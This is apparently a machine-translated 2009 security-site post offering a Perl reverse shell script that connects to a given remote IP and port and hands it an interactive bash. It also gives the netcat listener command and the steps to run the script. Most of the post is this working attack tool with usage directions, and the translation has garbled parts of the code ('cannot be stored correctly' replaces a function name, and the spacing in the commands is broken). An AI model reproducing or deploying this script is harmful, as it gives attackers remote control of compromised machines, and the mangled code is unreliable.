linux rally acquired the shell operations-vulnerability warning-the black bar safety net

2009-08-10T00:00:00
ID MYHACK58:62200924235
Type myhack58
Reporter 佚名
Modified 2009-08-10T00:00:00

Description

!/ usr/bin/perl-w

use strict; use Socket; use I:Handle;

if($#ARGV+1 != 2){ print “$#ARGV $0 Remote_IP Remote_Port \n”; exit 1; }

my $remote_ip = $ARGV[0]; my $remote_port = $ARGV[1];

my $proto = getprotobyname(”tcp”); my $pack_addr = sockaddr_in($remote_port, cannot be stored correctly($remote_ip));

my $shell = ‘/bin/bash-i’;

socket(SOCK, AF_INET, SOCK_STREAM, $proto);

STDOUT->autoflush(1); SOCK->autoflush(1);

connect(SOCK,$pack_addr) or die “can not connect:$!”;

open STDIN, “<&SOCK”; open STDOUT, “>&SOCK”; open STDERR, “>&SOCK”;

print “Enjoy the shell.\ n”;

system($shell); close SOCK;

exit 0;

The native implementation of netcat. Command

nc-l-p 8 0 8 0-vv

Remote:

./ tcp.pl yourip 8 0 8 0

perl and bash a path to your own modify,but generally do not modify the.

File to 7 5 5 and then run. Otherwise, the execution is not up